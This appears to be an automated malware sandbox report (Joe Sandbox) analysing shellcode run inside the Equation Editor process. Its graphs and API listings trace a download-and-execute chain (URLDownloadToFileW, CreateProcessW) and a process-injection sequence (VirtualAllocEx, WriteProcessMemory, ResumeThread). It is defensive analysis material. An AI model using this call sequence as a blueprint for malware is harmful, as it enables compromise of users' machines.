                                                execution_graph 1284 2ac7ab 1285 2ac7a2 1284->1285 1288 2aca56 ExitProcess 1285->1288 1311 2aca6f 1288->1311 1290 2aca62 1292 2aca7c 1290->1292 1333 2aca8b 1290->1333 1294 2acac4 1292->1294 1353 2acab2 1292->1353 1312 2aca75 1311->1312 1313 2aca8b 18 API calls 1312->1313 1314 2aca7c 1313->1314 1315 2acab2 15 API calls 1314->1315 1316 2acac4 1314->1316 1317 2aca98 1315->1317 1317->1316 1318 2acb1e 1317->1318 1319 2acaac 1317->1319 1320 2acb40 URLDownloadToFileW 1318->1320 1321 2acb9c 8 API calls 1318->1321 1357 2acb00 1319->1357 1324 2acbb5 5 API calls 1320->1324 1321->1320 1327 2acba5 1324->1327 1325 2acbfc CreateProcessW 1326 2acc0f ExitProcess 1325->1326 1329 2acc03 1326->1329 1327->1325 1328 2acc1f 1327->1328 1330 2acbd6 3 API calls 1327->1330 1328->1290 1329->1328 1331 2acc12 ExitProcess 1329->1331 1332 2acbc7 1330->1332 1332->1325 1332->1328 1334 2aca91 1333->1334 1335 2acab2 15 API calls 1334->1335 1336 2aca98 1334->1336 1335->1336 1337 2acb1e 1336->1337 1338 2acaac 1336->1338 1342 2acac4 1336->1342 1339 2acb40 URLDownloadToFileW 1337->1339 1340 2acb9c 8 API calls 1337->1340 1341 2acb00 15 API calls 1338->1341 1344 2acbb5 5 API calls 1339->1344 1340->1339 1341->1342 1348 2acba5 1344->1348 1345 2acbfc CreateProcessW 1346 2acc0f ExitProcess 1345->1346 1347 2acc03 1346->1347 1350 2acc12 ExitProcess 1347->1350 1352 2acc1f 1347->1352 1348->1345 1349 2acbd6 3 API calls 1348->1349 1348->1352 1351 2acbc7 1349->1351 1351->1345 1351->1352 1352->1292 1354 2acab5 1353->1354 1355 2acb00 15 API calls 1354->1355 1356 2acac4 1355->1356 1358 2acb02 1357->1358 1359 2acb15 15 API calls 1358->1359 1360 2acb07 1359->1360 1397 2ac730 1398 2ac78c 1397->1398 1401 2ac802 1398->1401 1402 2ac793 1401->1402 1403 2aca56 25 API calls 1402->1403 1404 2ac791 1403->1404 1221 2acb00 1222 2acb02 1221->1222 1225 2acb15 LoadLibraryW 1222->1225 1224 2acb07 1240 2acb2f 1225->1240 1227 2acb1c 1228 2acb40 URLDownloadToFileW 1227->1228 1272 2acb9c URLDownloadToFileW 1227->1272 1254 2acbb5 1228->1254 1232 2acbfc CreateProcessW 1270 2acc0f 1232->1270 1234 2acba5 1234->1232 1239 2acc1f 1234->1239 1263 2acbd6 1234->1263 1235 2acc03 1237 2acc12 ExitProcess 1235->1237 1235->1239 1239->1224 1241 2acb32 1240->1241 1242 2acb9c 8 API calls 1241->1242 1243 2acb40 URLDownloadToFileW 1242->1243 1245 2acbb5 5 API calls 1243->1245 1248 2acba5 1245->1248 1246 2acbfc CreateProcessW 1247 2acc0f ExitProcess 1246->1247 1249 2acc03 1247->1249 1248->1246 1250 2acbd6 3 API calls 1248->1250 1253 2acc1f 1248->1253 1252 2acc12 ExitProcess 1249->1252 1249->1253 1251 2acbc7 1250->1251 1251->1246 1251->1253 1253->1227 1255 2acbb8 1254->1255 1256 2acbd6 3 API calls 1255->1256 1257 2acbc7 1256->1257 1258 2acbfc CreateProcessW 1257->1258 1261 2acc24 1257->1261 1259 2acc0f ExitProcess 1258->1259 1260 2acc03 1259->1260 1260->1261 1262 2acc12 ExitProcess 1260->1262 1261->1234 1264 2acbd9 CreateProcessW 1263->1264 1266 2acc0f ExitProcess 1264->1266 1267 2acc03 1266->1267 1268 2acbc7 1267->1268 1269 2acc12 ExitProcess 1267->1269 1268->1232 1268->1239 1271 2acc12 ExitProcess 1270->1271 1273 2acbb5 5 API calls 1272->1273 1276 2acba5 1272->1276 1273->1276 1274 2acbfc CreateProcessW 1275 2acc0f ExitProcess 1274->1275 1277 2acc03 1275->1277 1276->1274 1278 2acbd6 3 API calls 1276->1278 1281 2acc1f 1276->1281 1279 2acc12 ExitProcess 1277->1279 1277->1281 1280 2acbc7 1278->1280 1280->1274 1280->1281 1281->1228 1413 2ac798 1414 2ac79a 1413->1414 1415 2aca56 25 API calls 1414->1415 1416 2aca44 1415->1416 1282 2acc16 GetPEB 1283 2acc21 1282->1283

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_002AC828 53 Function_002ACA56 0->53 1 Function_002ACB2F 13 Function_002ACC3E 1->13 20 Function_002ACC0F 1->20 72 Function_002ACBB5 1->72 82 Function_002ACB9C 1->82 107 Function_002ACBD6 1->107 2 Function_002AA12F 3 Function_002AC82D 3->53 4 Function_002AB322 5 Function_0029E622 6 Function_002AF921 7 Function_002AC826 7->53 8 Function_002AD126 9 Function_002A7225 10 Function_002A0F25 11 Function_002A1939 12 Function_002A723E 14 Function_002AC83E 14->53 15 Function_002AC832 15->53 16 Function_002AA833 17 Function_002AC730 23 Function_002AC802 17->23 18 Function_002A7236 19 Function_002A8C08 21 Function_002AA10F 22 Function_002ACE0C 23->53 24 Function_0029E000 25 Function_002ACB00 32 Function_002ACB15 25->32 26 Function_002AC801 27 Function_002AC805 27->53 28 Function_002AC81F 28->53 29 Function_002ACA12 30 Function_002A4016 31 Function_002ACC16 31->13 32->1 32->13 32->20 32->72 32->82 32->107 33 Function_002A4E68 34 Function_002ACE6E 35 Function_002AC36E 36 Function_002ACA6F 36->13 36->20 36->25 67 Function_002ACAB2 36->67 36->72 73 Function_002ACA8B 36->73 75 Function_002ACC8F 36->75 36->82 36->107 37 Function_002AC362 38 Function_002AA161 39 Function_002AC864 39->53 40 Function_002AC878 41 Function_0029F77D 42 Function_002AA57F 43 Function_002AA773 44 Function_002AC84A 44->53 45 Function_002ABD4C 46 Function_002AA140 47 Function_002AC745 48 Function_002A9959 49 Function_002AC35E 50 Function_002A305F 51 Function_002AC35C 52 Function_002AEA5D 53->13 53->20 53->25 53->36 53->67 53->72 53->73 53->82 53->107 54 Function_002AC857 54->53 55 Function_002A7254 56 Function_002AC854 56->53 57 Function_002AC7AB 57->53 58 Function_002A99AF 59 Function_002AC7AF 59->53 60 Function_002AC7AD 60->53 61 Function_002AC2A0 62 Function_002AC7A0 62->53 63 Function_002A94A6 64 Function_002AC7A7 64->53 65 Function_002B0DA6 66 Function_002AC3BF 67->25 68 Function_002AC2B3 69 Function_002AA6B0 70 Function_002AC7B1 70->53 71 Function_002AC9B4 72->13 72->20 72->107 73->13 73->20 73->25 73->67 73->72 73->75 73->82 73->107 74 Function_002A928E 76 Function_002AC887 77 Function_002AC29A 78 Function_002AD29A 79 Function_002ADC9B 80 Function_002AC798 80->53 81 Function_002AC39E 82->13 82->20 82->72 82->107 83 Function_002AC79C 83->53 84 Function_0029E194 85 Function_002A9A94 86 Function_002A45EA 87 Function_002AC7ED 87->53 88 Function_002A7FE6 89 Function_002A70F8 90 Function_002A55F8 91 Function_002AC7F8 91->53 92 Function_002AC7FC 92->53 93 Function_002AAFF3 94 Function_002AECF0 95 Function_002AA0F1 96 Function_002AC7F1 96->53 97 Function_002A50C8 98 Function_002A18C8 99 Function_002AC7CD 99->53 100 Function_002A8CC2 101 Function_002AA5C2 102 Function_002A50D8 103 Function_002A54DF 104 Function_002A55DF 105 Function_002A90D0 106 Function_002AC7D1 106->53 107->20 108 Function_002AC7D7 108->53

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2acb15-2acb3a LoadLibraryW call 2acb2f 5 2acb40-2acba6 URLDownloadToFileW call 2acbb5 0->5 6 2acb3b call 2acb9c 0->6 12 2acba9-2acbab 5->12 13 2acbfc-2acc06 CreateProcessW call 2acc0f 5->13 6->5 17 2acbad 12->17 18 2acc21 12->18 24 2acc58 13->24 25 2acc08 13->25 21 2acc1f-2acc20 17->21 22 2acbaf-2acbc8 call 2acbd6 17->22 19 2acc24-2acc35 call 2acc3e 18->19 32 2acc37-2acc3b 19->32 21->18 42 2acbca-2acbcb 22->42 43 2acc2f-2acc31 22->43 29 2acc5a-2acc5e 24->29 30 2acc60-2acc64 24->30 27 2acc0a-2acc14 ExitProcess 25->27 28 2acc79-2acc7b 25->28 37 2acc8b-2acc8c 28->37 29->30 34 2acc6c-2acc73 29->34 30->28 35 2acc66-2acc6a 30->35 39 2acc77 34->39 40 2acc75 34->40 35->28 35->34 44 2acc7d-2acc86 39->44 40->28 45 2acc32-2acc35 42->45 46 2acbcd-2acbce 42->46 43->45 47 2acc4a-2acc4d 44->47 45->19 45->32 50 2acc3f-2acc47 46->50 51 2acbd0-2acbd3 46->51 48 2acc88 47->48 49 2acc4f-2acc52 47->49 48->37 49->44 52 2acc54 49->52 50->47 53 2acc2c-2acc2e call 2acc3e 51->53 54 2acbd5-2acbfb 51->54 52->24 53->43 54->13
                                                APIs
                                                • LoadLibraryW.KERNEL32(002ACB07), ref: 002ACB15
                                                  • Part of subcall function 002ACB2F: URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E
                                                  • Part of subcall function 002ACB2F: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
                                                  • Part of subcall function 002ACB2F: ExitProcess.KERNELBASE(00000000), ref: 002ACC14
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: Process$CreateDownloadExitFileLibraryLoad
                                                • String ID:
                                                • API String ID: 3376099886-0
                                                • Opcode ID: daf2d30e0ec1adf7040262130c6e2f298998fb8ce8c8b0d163854f404aace5fc
                                                • Instruction ID: 58b8529db521aca1b4e49b42812076c297f6a9b45739cb43e58029de12e7510a
                                                • Opcode Fuzzy Hash: daf2d30e0ec1adf7040262130c6e2f298998fb8ce8c8b0d163854f404aace5fc
                                                • Instruction Fuzzy Hash: 5431A6A246C3C11FCB26A7700C6AA55BF656F63314F688ECFD0C6090A3EA698154C767

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 56 2aca8b 57 2aca91 56->57 58 2aca8c call 2acc8f 56->58 59 2aca98-2aca99 57->59 60 2aca93 call 2acab2 57->60 58->57 61 2acb0b-2acb10 59->61 62 2aca9b-2acaa0 59->62 60->59 64 2acb13 61->64 62->61 63 2acaa2 62->63 63->64 65 2acaa4-2acaa8 63->65 66 2acaaa 65->66 67 2acafd-2acb09 65->67 68 2acb1e-2acb3a 66->68 69 2acaac-2acafc call 2acb00 66->69 67->61 72 2acb40-2acba6 URLDownloadToFileW call 2acbb5 68->72 73 2acb3b call 2acb9c 68->73 69->67 84 2acba9-2acbab 72->84 85 2acbfc-2acc06 CreateProcessW call 2acc0f 72->85 73->72 91 2acbad 84->91 92 2acc21 84->92 99 2acc58 85->99 100 2acc08 85->100 96 2acc1f-2acc20 91->96 97 2acbaf-2acbc8 call 2acbd6 91->97 94 2acc24-2acc35 call 2acc3e 92->94 107 2acc37-2acc3b 94->107 96->92 117 2acbca-2acbcb 97->117 118 2acc2f-2acc31 97->118 104 2acc5a-2acc5e 99->104 105 2acc60-2acc64 99->105 102 2acc0a-2acc14 ExitProcess 100->102 103 2acc79-2acc7b 100->103 112 2acc8b-2acc8c 103->112 104->105 109 2acc6c-2acc73 104->109 105->103 110 2acc66-2acc6a 105->110 114 2acc77 109->114 115 2acc75 109->115 110->103 110->109 119 2acc7d-2acc86 114->119 115->103 120 2acc32-2acc35 117->120 121 2acbcd-2acbce 117->121 118->120 122 2acc4a-2acc4d 119->122 120->94 120->107 125 2acc3f-2acc47 121->125 126 2acbd0-2acbd3 121->126 123 2acc88 122->123 124 2acc4f-2acc52 122->124 123->112 124->119 127 2acc54 124->127 125->122 128 2acc2c-2acc2e call 2acc3e 126->128 129 2acbd5-2acbfb 126->129 127->99 128->118 129->85
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: CreateDownloadFileProcess
                                                • String ID:
                                                • API String ID: 3322632208-0
                                                • Opcode ID: aae0db6790f011fe53033717ca6883099684063eaccabe539bc309a663605c2b
                                                • Instruction ID: 41f738c8b25d797d16f1dc73ef3db0adaffad93c1cb0f499af5c6d3f15010d19
                                                • Opcode Fuzzy Hash: aae0db6790f011fe53033717ca6883099684063eaccabe539bc309a663605c2b
                                                • Instruction Fuzzy Hash: E75115A242C3C11FDB23AB300D6AA55BF657F13314B6C8ECFD0C64A0A3EA698515C767

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 131 2acb2f-2acba6 call 2acb9c URLDownloadToFileW call 2acbb5 140 2acba9-2acbab 131->140 141 2acbfc-2acc06 CreateProcessW call 2acc0f 131->141 145 2acbad 140->145 146 2acc21 140->146 152 2acc58 141->152 153 2acc08 141->153 149 2acc1f-2acc20 145->149 150 2acbaf-2acbc8 call 2acbd6 145->150 147 2acc24-2acc35 call 2acc3e 146->147 160 2acc37-2acc3b 147->160 149->146 170 2acbca-2acbcb 150->170 171 2acc2f-2acc31 150->171 157 2acc5a-2acc5e 152->157 158 2acc60-2acc64 152->158 155 2acc0a-2acc14 ExitProcess 153->155 156 2acc79-2acc7b 153->156 165 2acc8b-2acc8c 156->165 157->158 162 2acc6c-2acc73 157->162 158->156 163 2acc66-2acc6a 158->163 167 2acc77 162->167 168 2acc75 162->168 163->156 163->162 172 2acc7d-2acc86 167->172 168->156 173 2acc32-2acc35 170->173 174 2acbcd-2acbce 170->174 171->173 175 2acc4a-2acc4d 172->175 173->147 173->160 178 2acc3f-2acc47 174->178 179 2acbd0-2acbd3 174->179 176 2acc88 175->176 177 2acc4f-2acc52 175->177 176->165 177->172 180 2acc54 177->180 178->175 181 2acc2c-2acc2e call 2acc3e 179->181 182 2acbd5-2acbfb 179->182 180->152 181->171 182->141
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: Process$CreateDownloadExitFile
                                                • String ID:
                                                • API String ID: 2126523932-0
                                                • Opcode ID: 1644bbf2a3913ddcffe31929f1a10b5a5fdc839b81794f7fd4bc06f53cb41c47
                                                • Instruction ID: 0666ab034398fdf379679c4b91da888508a0ddfb04fd570fcb2f56545d25bbbe
                                                • Opcode Fuzzy Hash: 1644bbf2a3913ddcffe31929f1a10b5a5fdc839b81794f7fd4bc06f53cb41c47
                                                • Instruction Fuzzy Hash: 9E3175A285C3C11FCB2297700C6DA55BF656F53314F688ECFD0DA0A493EA698154C766

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 184 2acb9c-2acb9e URLDownloadToFileW 185 2acba5-2acba6 184->185 186 2acba0 call 2acbb5 184->186 187 2acba9-2acbab 185->187 188 2acbfc-2acc06 CreateProcessW call 2acc0f 185->188 186->185 192 2acbad 187->192 193 2acc21 187->193 199 2acc58 188->199 200 2acc08 188->200 196 2acc1f-2acc20 192->196 197 2acbaf-2acbc8 call 2acbd6 192->197 194 2acc24-2acc35 call 2acc3e 193->194 207 2acc37-2acc3b 194->207 196->193 217 2acbca-2acbcb 197->217 218 2acc2f-2acc31 197->218 204 2acc5a-2acc5e 199->204 205 2acc60-2acc64 199->205 202 2acc0a-2acc14 ExitProcess 200->202 203 2acc79-2acc7b 200->203 212 2acc8b-2acc8c 203->212 204->205 209 2acc6c-2acc73 204->209 205->203 210 2acc66-2acc6a 205->210 214 2acc77 209->214 215 2acc75 209->215 210->203 210->209 219 2acc7d-2acc86 214->219 215->203 220 2acc32-2acc35 217->220 221 2acbcd-2acbce 217->221 218->220 222 2acc4a-2acc4d 219->222 220->194 220->207 225 2acc3f-2acc47 221->225 226 2acbd0-2acbd3 221->226 223 2acc88 222->223 224 2acc4f-2acc52 222->224 223->212 224->219 227 2acc54 224->227 225->222 228 2acc2c-2acc2e call 2acc3e 226->228 229 2acbd5-2acbfb 226->229 227->199 228->218 229->188
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,002ACB40,?,00000000,00000000), ref: 002ACB9E
                                                  • Part of subcall function 002ACBB5: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
                                                  • Part of subcall function 002ACBB5: ExitProcess.KERNELBASE(00000000), ref: 002ACC14
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: Process$CreateDownloadExitFile
                                                • String ID:
                                                • API String ID: 2126523932-0
                                                • Opcode ID: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                • Instruction ID: e4ac918957ed2be2c63adf5dd08b37af5c065bbf052f95df20913fa416035426
                                                • Opcode Fuzzy Hash: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                • Instruction Fuzzy Hash: D711297503834127CE10FB708D85B9AF35FBBD3720F348D4BE1180A116DD70C9689669

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 2acbb5-2acbc8 call 2acbd6 236 2acbca-2acbcb 231->236 237 2acc2f-2acc31 231->237 238 2acc32-2acc35 236->238 239 2acbcd-2acbce 236->239 237->238 240 2acc37-2acc3b 238->240 241 2acc24-2acc35 call 2acc3e 238->241 242 2acc3f-2acc47 239->242 243 2acbd0-2acbd3 239->243 241->240 245 2acc4a-2acc4d 242->245 246 2acc2c-2acc2e call 2acc3e 243->246 247 2acbd5-2acc06 CreateProcessW call 2acc0f 243->247 249 2acc88 245->249 250 2acc4f-2acc52 245->250 246->237 258 2acc58 247->258 262 2acc08 247->262 253 2acc8b-2acc8c 249->253 255 2acc7d-2acc86 250->255 256 2acc54 250->256 255->245 256->258 260 2acc5a-2acc5e 258->260 261 2acc60-2acc64 258->261 260->261 263 2acc6c-2acc73 260->263 264 2acc79-2acc7b 261->264 265 2acc66-2acc6a 261->265 262->264 266 2acc0a-2acc14 ExitProcess 262->266 267 2acc77 263->267 268 2acc75 263->268 264->253 265->263 265->264 267->255 268->264
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: Process$CreateExit
                                                • String ID:
                                                • API String ID: 126409537-0
                                                • Opcode ID: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                • Instruction ID: 9a6a2ec801d5306c1b89a43adc21dbf9443d9973886ffc46b8fdd55fb45e874b
                                                • Opcode Fuzzy Hash: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                • Instruction Fuzzy Hash: 7B110A7503834367CB21FB7088806DAB79BEB83730F74C95BE4984501ADD34C9A68729

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 271 2acbd6-2acc06 CreateProcessW call 2acc0f 277 2acc58 271->277 278 2acc08 271->278 281 2acc5a-2acc5e 277->281 282 2acc60-2acc64 277->282 279 2acc0a-2acc14 ExitProcess 278->279 280 2acc79-2acc7b 278->280 286 2acc8b-2acc8c 280->286 281->282 284 2acc6c-2acc73 281->284 282->280 285 2acc66-2acc6a 282->285 287 2acc77 284->287 288 2acc75 284->288 285->280 285->284 290 2acc7d-2acc86 287->290 288->280 292 2acc88 290->292 293 2acc4f-2acc52 290->293 292->286 293->290 294 2acc54 293->294 294->277
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002ACBFC
                                                  • Part of subcall function 002ACC0F: ExitProcess.KERNELBASE(00000000), ref: 002ACC14
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: Process$CreateExit
                                                • String ID:
                                                • API String ID: 126409537-0
                                                • Opcode ID: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                • Instruction ID: 9452705a75eb74b393751cd08cacf5796ce2363455ecb71b8ef9cdda22a06579
                                                • Opcode Fuzzy Hash: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                • Instruction Fuzzy Hash: BB012BA9038343A7CB30BA748C847EA7757EB83730FB88A57D88D04049DD6895F38719

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 295 2acc0f-2acc14 ExitProcess
                                                APIs
                                                • ExitProcess.KERNELBASE(00000000), ref: 002ACC14
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                • Instruction Fuzzy Hash:

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 297 2acc16-2acc1e GetPEB 298 2acc21 297->298 299 2acc24-2acc35 call 2acc3e 298->299 302 2acc37-2acc3b 299->302
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction ID: 6206cd6b9208231793cbeddf61be258f1f4309382b35ec8e9783c12de730536e
                                                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                • Instruction Fuzzy Hash: 94D05E312114428FC304EF04D940E12F36AFFC4720B24C269E0044B719DB30ECA1CB94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 443 2aca56-2aca75 ExitProcess call 2aca6f 446 2aca7c-2aca7d 443->446 447 2aca77 call 2aca8b 443->447 448 2acad0-2acaec 446->448 449 2aca80 446->449 447->446 455 2acaed-2acaf0 448->455 451 2aca82-2aca85 449->451 452 2acaf1-2acafc 449->452 454 2aca88 451->454 451->455 457 2acafd-2acb09 452->457 454->457 458 2aca8a-2aca99 call 2acab2 454->458 455->452 459 2acb0b-2acb10 457->459 458->459 463 2aca9b-2acaa0 458->463 462 2acb13 459->462 463->459 464 2acaa2 463->464 464->462 465 2acaa4-2acaa8 464->465 465->457 466 2acaaa 465->466 467 2acb1e-2acb3a 466->467 468 2acaac-2acacd call 2acb00 466->468 471 2acb40-2acba6 URLDownloadToFileW call 2acbb5 467->471 472 2acb3b call 2acb9c 467->472 468->448 480 2acba9-2acbab 471->480 481 2acbfc-2acc06 CreateProcessW call 2acc0f 471->481 472->471 485 2acbad 480->485 486 2acc21 480->486 492 2acc58 481->492 493 2acc08 481->493 489 2acc1f-2acc20 485->489 490 2acbaf-2acbc8 call 2acbd6 485->490 487 2acc24-2acc35 call 2acc3e 486->487 500 2acc37-2acc3b 487->500 489->486 510 2acbca-2acbcb 490->510 511 2acc2f-2acc31 490->511 497 2acc5a-2acc5e 492->497 498 2acc60-2acc64 492->498 495 2acc0a-2acc14 ExitProcess 493->495 496 2acc79-2acc7b 493->496 505 2acc8b-2acc8c 496->505 497->498 502 2acc6c-2acc73 497->502 498->496 503 2acc66-2acc6a 498->503 507 2acc77 502->507 508 2acc75 502->508 503->496 503->502 512 2acc7d-2acc86 507->512 508->496 513 2acc32-2acc35 510->513 514 2acbcd-2acbce 510->514 511->513 515 2acc4a-2acc4d 512->515 513->487 513->500 518 2acc3f-2acc47 514->518 519 2acbd0-2acbd3 514->519 516 2acc88 515->516 517 2acc4f-2acc52 515->517 516->505 517->512 520 2acc54 517->520 518->515 521 2acc2c-2acc2e call 2acc3e 519->521 522 2acbd5-2acbfb 519->522 520->492 521->511 522->481
                                                APIs
                                                • ExitProcess.KERNELBASE(002ACA44), ref: 002ACA56
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0029E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_29e000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: c44ec1f4e43fe0341f78c31807ab001956be4505fba70030ac586171738022f9
                                                • Instruction ID: ada89c2aa40e6d7190a61b99a7fe6a083abe2159042ec07812f266c90d6e31b9
                                                • Opcode Fuzzy Hash: c44ec1f4e43fe0341f78c31807ab001956be4505fba70030ac586171738022f9
                                                • Instruction Fuzzy Hash: F92101A642D3C44FD703DF30196B1617F60BD2331472D8ACBD0C08F1A3EA619A2AD7A2

                                                Execution Graph

                                                Execution Coverage:15%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:128
                                                Total number of Limit Nodes:2
                                                execution_graph 8558 23cbe0 8559 23c9c2 8558->8559 8560 23ca6f 8559->8560 8563 23d928 8559->8563 8581 23d99e 8559->8581 8564 23d952 8563->8564 8577 23d95a 8564->8577 8600 23e094 8564->8600 8605 23e230 8564->8605 8609 23e1d2 8564->8609 8614 23e073 8564->8614 8619 23df6f 8564->8619 8624 23e4e8 8564->8624 8629 23e389 8564->8629 8633 23e349 8564->8633 8641 23e66a 8564->8641 8645 23e182 8564->8645 8650 23de83 8564->8650 8655 23de43 8564->8655 8660 23dfd8 8564->8660 8665 23e299 8564->8665 8673 23ddb9 8564->8673 8577->8560 8582 23d92c 8581->8582 8584 23d9a1 8581->8584 8583 23d95a 8582->8583 8585 23de43 2 API calls 8582->8585 8586 23de83 2 API calls 8582->8586 8587 23e182 2 API calls 8582->8587 8588 23e66a 2 API calls 8582->8588 8589 23e349 4 API calls 8582->8589 8590 23e389 2 API calls 8582->8590 8591 23e4e8 2 API calls 8582->8591 8592 23df6f 2 API calls 8582->8592 8593 23e073 2 API calls 8582->8593 8594 23e1d2 2 API calls 8582->8594 8595 23e230 2 API calls 8582->8595 8596 23e094 2 API calls 8582->8596 8597 23ddb9 2 API calls 8582->8597 8598 23e299 4 API calls 8582->8598 8599 23dfd8 2 API calls 8582->8599 8583->8560 8584->8560 8585->8583 8586->8583 8587->8583 8588->8583 8589->8583 8590->8583 8591->8583 8592->8583 8593->8583 8594->8583 8595->8583 8596->8583 8597->8583 8598->8583 8599->8583 8601 23e09a 8600->8601 8678 23c100 8601->8678 8682 23c0f8 8601->8682 8602 23e0cc 8602->8577 8606 23e24b 8605->8606 8686 23bfd8 8606->8686 8690 23bfd0 8606->8690 8610 23e1d8 8609->8610 8694 23c260 8610->8694 8698 23c259 8610->8698 8611 23e732 8615 23df86 8614->8615 8616 23df9b 8615->8616 8702 23b980 8615->8702 8706 23b979 8615->8706 8616->8577 8620 23df75 8619->8620 8622 23b980 ResumeThread 8620->8622 8623 23b979 ResumeThread 8620->8623 8621 23df9b 8621->8577 8622->8621 8623->8621 8627 23c100 WriteProcessMemory 8624->8627 8628 23c0f8 WriteProcessMemory 8624->8628 8625 23e496 8625->8624 8626 23e342 8625->8626 8627->8625 8628->8625 8631 23c100 WriteProcessMemory 8629->8631 8632 23c0f8 WriteProcessMemory 8629->8632 8630 23e3ad 8631->8630 8632->8630 8634 23de9e 8633->8634 8635 23e29d 8633->8635 8636 23df9b 8634->8636 8639 23b980 ResumeThread 8634->8639 8640 23b979 ResumeThread 8634->8640 8710 23ba68 8635->8710 8714 23ba70 8635->8714 8636->8577 8639->8636 8640->8636 8642 23e66e 8641->8642 8643 23bfd0 VirtualAllocEx 8642->8643 8644 23bfd8 VirtualAllocEx 8642->8644 8643->8642 8644->8642 8646 23e0ab 8645->8646 8647 23e0cc 8646->8647 8648 23c100 WriteProcessMemory 8646->8648 8649 23c0f8 WriteProcessMemory 8646->8649 8647->8577 8647->8647 8648->8647 8649->8647 8651 23de9e 8650->8651 8653 23b980 ResumeThread 8651->8653 8654 23b979 